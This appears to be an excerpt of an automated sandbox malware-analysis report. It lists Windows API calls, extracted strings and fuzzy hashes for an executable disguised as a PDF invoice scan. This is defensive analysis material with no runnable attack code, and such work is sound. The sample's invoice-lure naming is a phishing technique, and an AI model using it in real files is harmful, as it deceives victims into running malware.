                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent$_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 2040099840-1403004172
                                                                              • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                              • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                                                                              • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                              • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00469483
                                                                              • GetParent.USER32 ref: 0046949E
                                                                              • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 004694A8
                                                                              • GetParent.USER32 ref: 004694C1
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent$_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 2040099840-1403004172
                                                                              • Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                              • Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
                                                                              • Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                              • Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
                                                                              APIs
                                                                                • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
                                                                              • SendMessageW.USER32(75A923D0,00001001,00000000,00000000), ref: 00448E73
                                                                              • SendMessageW.USER32(75A923D0,00001026,00000000,00000000), ref: 00448E7E
                                                                                • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                              • String ID:
                                                                              • API String ID: 3771399671-0
                                                                              • Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                              • Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
                                                                              • Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                              • Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                              • String ID:
                                                                              • API String ID: 3413494760-0
                                                                              • Opcode ID: 6277d5ae76659215f0551e1ccd319f779486d475f9f2ec5e8ff941c25e4e1a25
                                                                              • Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
                                                                              • Opcode Fuzzy Hash: 6277d5ae76659215f0551e1ccd319f779486d475f9f2ec5e8ff941c25e4e1a25
                                                                              • Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004377D7
                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
                                                                              • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                              • String ID:
                                                                              • API String ID: 2156557900-0
                                                                              • Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                              • Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
                                                                              • Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                              • Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsicoll
                                                                              • String ID: 0%d$DOWN$OFF
                                                                              • API String ID: 3832890014-468733193
                                                                              • Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                              • Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
                                                                              • Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                              • Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(00000000), ref: 0045E959
                                                                              • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                                                                              • VariantClear.OLEAUT32 ref: 0045E970
                                                                              • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                                                                              • __swprintf.LIBCMT ref: 0045EB1F
                                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                                                                              • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                                                                              Strings
                                                                              • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
                                                                              • String ID: %4d%02d%02d%02d%02d%02d
                                                                              • API String ID: 43541914-1568723262
                                                                              • Opcode ID: 3f7a81eccf7885f9f7caff86a9cebaeab8dbc5317498bf8fafba40ff91b4e1f5
                                                                              • Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
                                                                              • Opcode Fuzzy Hash: 3f7a81eccf7885f9f7caff86a9cebaeab8dbc5317498bf8fafba40ff91b4e1f5
                                                                              • Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
                                                                              APIs
                                                                              • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
                                                                              • Sleep.KERNEL32(0000000A), ref: 0042FE6E
                                                                              • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: DecrementInterlocked$Sleep
                                                                              • String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
                                                                              • API String ID: 2250217261-3412429629
                                                                              • Opcode ID: 215c5e34d51a873ec91725a31313336b759110b61dd29ed402e16e4472e8412f
                                                                              • Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
                                                                              • Opcode Fuzzy Hash: 215c5e34d51a873ec91725a31313336b759110b61dd29ed402e16e4472e8412f
                                                                              • Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                              • API String ID: 0-1603158881
                                                                              • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                              • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                                                                              • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                              • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00479D1F
                                                                              • VariantInit.OLEAUT32(?), ref: 00479F06
                                                                              • VariantClear.OLEAUT32(?), ref: 00479F11
                                                                              • VariantInit.OLEAUT32(?), ref: 00479DF7
                                                                                • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                                                                • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                                                                • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                                                              • VariantClear.OLEAUT32(?), ref: 00479F9C
                                                                                • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                                                                              • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                              • API String ID: 665237470-60002521
                                                                              • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                              • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                                              • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                              • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ConnectRegistry_wcslen
                                                                              • String ID: HH
                                                                              • API String ID: 535477410-2761332787
                                                                              • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                              • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                                                                              • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                              • Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0045F317
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
                                                                              • IsMenu.USER32(?), ref: 0045F380
                                                                              • CreatePopupMenu.USER32 ref: 0045F3C5
                                                                              • GetMenuItemCount.USER32(?), ref: 0045F42F
                                                                              • InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                              • String ID: 0$2
                                                                              • API String ID: 3311875123-3793063076
                                                                              • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                              • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                                                                              • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                              • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe), ref: 0043719E
                                                                              • LoadStringW.USER32(00000000), ref: 004371A7
                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                                                                              • LoadStringW.USER32(00000000), ref: 004371C0
                                                                              • _printf.LIBCMT ref: 004371EC
                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
                                                                              Strings
                                                                              • C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe, xrefs: 00437189
                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadModuleString$Message_printf
                                                                              • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
                                                                              • API String ID: 220974073-1886467443
                                                                              • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                              • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                                                                              • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                              • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                              • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                                                                              • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                              • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                                                                              APIs
                                                                                • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,?,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,004A8E80,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,0040F3D2), ref: 0040FFCA
                                                                                • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                                                                              • MoveFileW.KERNEL32(?,?), ref: 0045358E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 978794511-0
                                                                              • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                              • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                                                                              • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                              • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
